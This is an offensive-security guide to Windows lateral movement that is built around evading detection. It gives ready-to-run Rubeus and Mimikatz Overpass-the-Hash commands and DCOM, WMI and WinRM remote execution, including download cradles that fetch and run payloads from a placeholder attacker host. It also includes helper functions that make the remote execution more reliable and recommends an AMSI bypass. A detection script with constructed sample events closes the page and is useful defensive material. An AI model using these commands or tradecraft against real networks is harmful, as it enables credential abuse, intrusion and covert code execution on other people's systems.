Lateral Movement
LotL OPSEC
DCOM, WMI, WinRM, Overpass-the-Hash — LotL
Overpass-the-Hash (Pass-the-Key)
Using AES-256 keys instead of NTLM hashes is the safer OPSEC choice. Overpass-the-Hash with the RC4 (NTLM) key forces the AS-REQ to use RC4-HMAC (etype 0x17), which stands out in Event 4768/4769 on the DC in any domain where AES is the norm; with the AES-256 key the exchange uses etype 0x12 like every other workstation. Note that the network logon on the target (Event 4624, Logon Type 3) still happens; it just looks like ordinary Kerberos authentication rather than NTLM.
AES-256 blends into normal Kerberos traffic: using Kerberos instead of NTLM removes the most common SOC trigger (NTLM authentication from an unusual host). Rubeus additionally offers an /opsec switch for asktgt that mimics a real Windows client (initial AS-REQ without pre-authentication, AES enforced).
```powershell
# Request a TGT with the AES-256 key and inject it into the current logon session (stealth PTT)
.\Rubeus.exe asktgt /domain:domain.local /user:Administrator `
    /aes256:AES_KEY_HERE /nowrap /ptt

# Pass-the-Key via Mimikatz (AES-256), typed in the mimikatz console after privilege::debug.
# Spawns cmd.exe in a new logon session (Event 4624, Logon Type 9) whose Kerberos
# credentials are the supplied key; requires local admin / SeDebugPrivilege.
sekurlsa::pth /user:Administrator /domain:domain.local /aes256:AES_KEY_HERE /run:cmd.exe
```
DCOM Execution (Ninja Level)
Unlike PsExec, DCOM installs no service, and unlike WMI the child process is not parented by WmiPrvSE.exe: the payload runs inside a legitimate Windows application that is already remotely activatable, which keeps it below the threshold of many default EDR rules.
The DCOM child spawns under mmc.exe (MMC20.Application) or explorer.exe (ShellWindows), both ordinary admin-desktop processes, so this is one of the least suspicious options from a SOC's point of view. Requirements and caveats: local admin on the target, inbound DCOM allowed by the target's host firewall (TCP 135 plus a dynamic RPC port), and the ShellWindows variant only works while an interactive explorer.exe session exists on the target. mmc.exe or explorer.exe spawning a shell is itself an anomaly that mature EDRs alert on, so keep the child command line unremarkable.
```powershell
# RCE through the MMC20.Application COM object (child process appears under mmc.exe).
# ExecuteShellCommand(Command, Directory, Parameters, WindowState); "7" = minimized
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "TARGET"))
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe", $null, `
    "/c powershell -nop -w hidden -enc BASE64_PAYLOAD_HERE", "7")

# RCE through ShellWindows (child process appears under explorer.exe).
# ShellWindows has no ProgID, so it is activated by CLSID; Item() returns the first
# explorer window, which only exists while a user is logged on interactively.
# ShellExecute(File, Arguments, Directory, Operation, ShowWindow); 0 = hidden
$com = [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39", "TARGET"))
$com.Item().Document.Application.ShellExecute("cmd.exe", `
    "/c powershell -nop -w hidden -c iex(iwr http://ATTACKER/p.ps1 -UseBasicParsing).Content", `
    "C:\Windows\System32", $null, 0)
```
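The two DCOM variants above wrapped in one function, as an added example that is not code from the original page: it builds the -EncodedCommand payload correctly (PowerShell expects base64 of UTF-16LE, a frequent source of "it silently did nothing"), checks that the RPC endpoint mapper is reachable before activation, and handles the ShellWindows case where no interactive session exists. The function name, its parameters and the TARGET host name are assumptions for illustration.

```powershell
function Invoke-DcomCommand {
    <#
    .SYNOPSIS
        Runs a script block on a remote host via DCOM (MMC20.Application or ShellWindows).
        Added example, not from the original page. Requires local admin on the target and
        inbound DCOM (TCP 135 + dynamic RPC port) allowed by the target's firewall.
    #>
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$ComputerName,
        [Parameter(Mandatory)][scriptblock]$ScriptBlock,
        [ValidateSet('MMC20', 'ShellWindows')][string]$Method = 'MMC20'
    )

    # -EncodedCommand takes base64 of the UTF-16LE bytes, not UTF-8
    $encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($ScriptBlock.ToString()))
    $psArgs  = "-nop -w hidden -enc $encoded"

    # Fail early if the endpoint mapper is unreachable; otherwise activation surfaces
    # as a generic COM exception after a long timeout.
    if (-not (Test-NetConnection -ComputerName $ComputerName -Port 135 -InformationLevel Quiet)) {
        throw "TCP 135 on $ComputerName is not reachable; DCOM activation will fail"
    }

    switch ($Method) {
        'MMC20' {
            $type = [type]::GetTypeFromProgID('MMC20.Application', $ComputerName)
            $com  = [activator]::CreateInstance($type)
            # ExecuteShellCommand(Command, Directory, Parameters, WindowState); 7 = minimized
            $com.Document.ActiveView.ExecuteShellCommand('powershell.exe', $null, $psArgs, '7')
        }
        'ShellWindows' {
            # ShellWindows has no ProgID; activate by CLSID. Item() is $null when no
            # interactive explorer.exe session exists on the target.
            $type = [type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39', $ComputerName)
            $com  = [activator]::CreateInstance($type)
            $win  = $com.Item()
            if ($null -eq $win) { throw "No interactive explorer.exe session on $ComputerName" }
            # ShellExecute(File, Arguments, Directory, Operation, ShowWindow); 0 = hidden
            $win.Document.Application.ShellExecute('powershell.exe', $psArgs, 'C:\Windows\System32', $null, 0)
        }
    }
    # Release the proxy so nothing lingers on the remote mmc.exe / explorer.exe
    [void][Runtime.InteropServices.Marshal]::ReleaseComObject($com)
}

# Usage (TARGET is a placeholder host name; the script block is whatever you need to run):
# Invoke-DcomCommand -ComputerName TARGET -Method MMC20 -ScriptBlock { whoami | Out-File C:\Windows\Temp\w.txt }
```

Both variants return nothing useful about the child process, so confirm execution out of band (the file written above, a callback, or a follow-up WMI query for the process); the MMC20 path is the one to prefer when no user is logged on to the target.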
Advanced WMI (Fileless)
Remote execution through native WMI calls, with no PsExec binary dropped on disk. Invoke-WmiMethod and wmic talk DCOM: TCP 135 for the endpoint mapper plus a dynamic RPC port. The CIM cmdlets (Invoke-CimMethod) default to WinRM (5985/5986) instead, which matters when only one of the two is open. wmic.exe is deprecated and is a disabled-by-default optional feature on recent Windows 11 releases, so do not count on it being there.
WMI creates the process as a child of WmiPrvSE.exe, so it shows up in Event 4688 (and Sysmon Event 1) with that parent, a well-known lateral-movement indicator. A fileless payload pulled straight into memory still passes through AMSI when PowerShell runs it, so it may need an AMSI bypass, and Script Block Logging (Event 4104) records its content.
```powershell
# Fileless payload delivery with the native PowerShell cmdlet (DCOM transport)
Invoke-WmiMethod -ComputerName TARGET -Class Win32_Process -Name Create `
    -ArgumentList "powershell.exe -nop -w hidden -c iex(iwr http://ATTACKER/p.ps1 -UseBasicParsing).Content"

# The same via the native wmic binary
wmic /node:TARGET process call create `
    "powershell.exe -nop -w hidden -c iex(iwr http://ATTACKER/p.ps1 -UseBasicParsing).Content"
```
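The one-liners above give no feedback beyond a raw ReturnValue, and they are tied to DCOM. As an added example (not code from the original page), the same Win32_Process.Create call with the transport chosen explicitly, DCOM on 135 or WinRM on 5985/5986, and the documented return codes decoded, so a failed create is distinguishable from a blocked port or a missing privilege. The function name and parameters are assumptions.

```powershell
function Invoke-WmiProcess {
    <#
    .SYNOPSIS
        Win32_Process.Create on a remote host with explicit transport selection and
        decoded return codes. Added example, not from the original page.
    #>
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$ComputerName,
        [Parameter(Mandatory)][string]$CommandLine,
        [ValidateSet('Dcom', 'Wsman')][string]$Protocol = 'Dcom',
        [pscredential]$Credential
    )

    # Documented Win32_Process.Create return values
    $returnCodes = @{
        0 = 'Success'; 2 = 'Access denied'; 3 = 'Insufficient privilege'
        8 = 'Unknown failure'; 9 = 'Path not found'; 21 = 'Invalid parameter'
    }

    # Dcom  = TCP 135 + dynamic RPC port (what Invoke-WmiMethod and wmic use)
    # Wsman = WinRM on 5985/5986, for when RPC is filtered but WinRM is open
    $opt = New-CimSessionOption -Protocol $Protocol
    $sessionParams = @{ ComputerName = $ComputerName; SessionOption = $opt }
    if ($Credential) { $sessionParams.Credential = $Credential }
    $session = New-CimSession @sessionParams

    try {
        $result = Invoke-CimMethod -CimSession $session -ClassName Win32_Process `
            -MethodName Create -Arguments @{ CommandLine = $CommandLine }
        [pscustomobject]@{
            ComputerName = $ComputerName
            Protocol     = $Protocol
            ReturnValue  = $result.ReturnValue
            Status       = $returnCodes[[int]$result.ReturnValue]
            ProcessId    = $result.ProcessId   # only populated when ReturnValue is 0
        }
    }
    finally {
        Remove-CimSession $session
    }
}

# Usage (TARGET and BASE64_PAYLOAD_HERE are placeholders):
# Invoke-WmiProcess -ComputerName TARGET -CommandLine 'powershell.exe -nop -w hidden -enc BASE64_PAYLOAD_HERE'
# Invoke-WmiProcess -ComputerName TARGET -Protocol Wsman -CommandLine 'cmd.exe /c whoami > C:\Windows\Temp\w.txt'
```

Whichever transport you pick, the child still carries WmiPrvSE.exe as its parent on the target; the transport choice changes which port has to be open and which logon the target records, not the process-tree indicator.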
WinRM / PSRemoting (Port 5985/5986)
A lateral movement channel for environments where SMB (445) is filtered. With Kerberos or NTLM (Negotiate) authentication the SOAP payload is encrypted at the message level even over plain HTTP on 5985; this does not hold for Basic authentication, which is cleartext on HTTP and belongs only on 5986 (HTTPS).
WinRM is a legitimate admin tool that sysadmins use in many environments, so the traffic looks like a normal admin session. On the target the work is done by wsmprovhost.exe, so child processes carry that parent in Event 4688, and each session produces a 4624 Logon Type 3. Invoke-Command -FilePath pushes a local script's content through the encrypted channel, which spares the target an outbound HTTP fetch for the payload.
```powershell
# WinRS: when PowerShell is heavily restricted (Constrained Language Mode, AppLocker)
winrs -remote:TARGET cmd.exe

# Interactive PS session (uses the token injected into the current logon session)
Enter-PSSession -ComputerName TARGET

# Remote in-memory payload execution
Invoke-Command -ComputerName TARGET -ScriptBlock {
    iex(iwr http://ATTACKER/payload.ps1 -UseBasicParsing).Content
}
```
OPSEC Notes & Telemetry Matrix
| Technique | Risk | EDR Telemetry | OPSEC Fix |
|---|---|---|---|
| PsExec (SMB) | High | Event 7045 (service install, System log) and 4697 (Security); PSEXESVC.exe written to ADMIN$. EDR triggers immediately. | Use WMI, DCOM or WinRM instead. |
| WMI | Medium-High | Event 4688 / Sysmon 1 with WmiPrvSE.exe as parent; 4624 Logon Type 3 on the target. | Fileless payload, AMSI bypass, unremarkable command line. |
| PSRemoting | Medium | Event 4624 (Logon Type 3); 4688 with wsmprovhost.exe as parent; Event 4104 (Script Block Logging) captures the script content. | Kerberos auth. Turning off PowerShell logging needs admin on the target and the registry/GPO change is itself visible, so prefer keeping sensitive logic out of the script block (winrs with cmd.exe, or -FilePath with a bland script). |
| DCOM (MMC20) | Low | Process creation under mmc.exe (explorer.exe for ShellWindows); 4624 Logon Type 3 on the target. mmc.exe spawning a shell is a stock detection rule in mature EDRs. | Least visible option when the host firewall allows DCOM; keep the child command line unremarkable. |
| Overpass-the-Hash | Low | Event 4624 Logon Type 9 on the source host (sekurlsa::pth). On the DC, 4768 with etype 0x12 (AES-256) looks like any workstation; 0x17 (RC4) is the downgrade indicator. | Use AES-256 keys, not NTLM/RC4. |
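The detection side of the matrix, as an added example that is not part of the original page: a rule set keyed on exactly the event fields named in the table (service name in 7045, parent process in 4688, ticket encryption type in 4768, logon type in 4624, script block text in 4104), run first over constructed sample events and then, via a second function, over the live event logs. The sample events are made up for the demo and use the field names Windows writes into EventData; the function names are assumptions. Knowing which rows light up is what tells you whether a given technique on this page is actually quiet in a particular environment.

```powershell
function Find-LateralMovement {
    # Flags the indicators from the telemetry matrix. Each event is an object with
    # Id, Host and a Props hashtable of EventData fields (as Get-WinEvent's XML gives them).
    param([Parameter(Mandatory)][object[]]$Events)

    # explorer.exe is deliberately absent: it parents far too many legitimate processes
    $noisyParents = 'WmiPrvSE.exe', 'mmc.exe', 'wsmprovhost.exe'

    foreach ($e in $Events) {
        $p = $e.Props
        $hit = switch ($e.Id) {
            7045 {  # PsExec -r renames the service, so match the image too
                if ($p.ServiceName -eq 'PSEXESVC' -or $p.ImagePath -match 'PSEXESVC') {
                    "PsExec-style service install: $($p.ServiceName)"
                }
            }
            4688 {
                $parent = Split-Path $p.ParentProcessName -Leaf   # -contains is case-insensitive
                if ($noisyParents -contains $parent) {
                    "Remote-exec parent $parent -> $(Split-Path $p.NewProcessName -Leaf)"
                }
            }
            4768 {
                if ($p.TicketEncryptionType -eq '0x17') {
                    "RC4 TGT request for $($p.TargetUserName) (Overpass-the-Hash with an NTLM key?)"
                }
            }
            4624 {
                if ($p.LogonType -eq '9') {
                    "NewCredentials logon (runas /netonly or sekurlsa::pth) as $($p.TargetUserName)"
                }
            }
            4104 {
                if ($p.ScriptBlockText -match 'iex\s*\(\s*iwr|-enc\s|FromBase64String') {
                    "Download-cradle / encoded script block"
                }
            }
        }
        if ($hit) { [pscustomobject]@{ Host = $e.Host; EventId = $e.Id; Finding = $hit } }
    }
}

function Get-RecentLateralMovement {
    # Live variant: pulls the last 24 h of the relevant IDs and maps EventData into Props.
    param([string]$ComputerName = $env:COMPUTERNAME)
    $logs = @{ Security = 4624, 4688, 4768; System = 7045; 'Microsoft-Windows-PowerShell/Operational' = 4104 }
    $events = foreach ($log in $logs.GetEnumerator()) {
        Get-WinEvent -ComputerName $ComputerName -ErrorAction SilentlyContinue `
            -FilterHashtable @{ LogName = $log.Key; Id = $log.Value; StartTime = (Get-Date).AddDays(-1) } |
        ForEach-Object {
            $xml = [xml]$_.ToXml()
            $props = @{}
            foreach ($d in $xml.Event.EventData.Data) { $props[$d.Name] = $d.'#text' }
            [pscustomobject]@{ Id = $_.Id; Host = $_.MachineName; Props = $props }
        }
    }
    Find-LateralMovement -Events $events
}

# Constructed sample events (not real logs). The explorer.exe row and the 0x12 row are
# negative controls that should stay silent; every other row matches one rule.
$sampleEvents = @(
    [pscustomobject]@{ Id = 7045; Host = 'SRV01'; Props = @{ ServiceName = 'PSEXESVC'; ImagePath = '%SystemRoot%\PSEXESVC.exe' } }
    [pscustomobject]@{ Id = 4688; Host = 'SRV01'; Props = @{ NewProcessName = 'C:\Windows\System32\cmd.exe'; ParentProcessName = 'C:\Windows\System32\wbem\WmiPrvSE.exe' } }
    [pscustomobject]@{ Id = 4688; Host = 'SRV02'; Props = @{ NewProcessName = 'C:\Windows\System32\cmd.exe'; ParentProcessName = 'C:\Windows\System32\mmc.exe' } }
    [pscustomobject]@{ Id = 4688; Host = 'SRV02'; Props = @{ NewProcessName = 'C:\Windows\System32\notepad.exe'; ParentProcessName = 'C:\Windows\explorer.exe' } }
    [pscustomobject]@{ Id = 4768; Host = 'DC01';  Props = @{ TargetUserName = 'Administrator'; TicketEncryptionType = '0x17' } }
    [pscustomobject]@{ Id = 4768; Host = 'DC01';  Props = @{ TargetUserName = 'jdoe'; TicketEncryptionType = '0x12' } }
    [pscustomobject]@{ Id = 4624; Host = 'WS01';  Props = @{ TargetUserName = 'Administrator'; LogonType = '9' } }
    [pscustomobject]@{ Id = 4104; Host = 'SRV03'; Props = @{ ScriptBlockText = 'iex(iwr http://ATTACKER/p.ps1 -UseBasicParsing).Content' } }
)
Find-LateralMovement -Events $sampleEvents | Format-Table -AutoSize
```

The 4768 rule is the one most worth internalising: it fires on the DC, not on either endpoint, so a host-centric view of "what did I leave on the target" misses it entirely, which is precisely why the AES-256 advice at the top of this page matters.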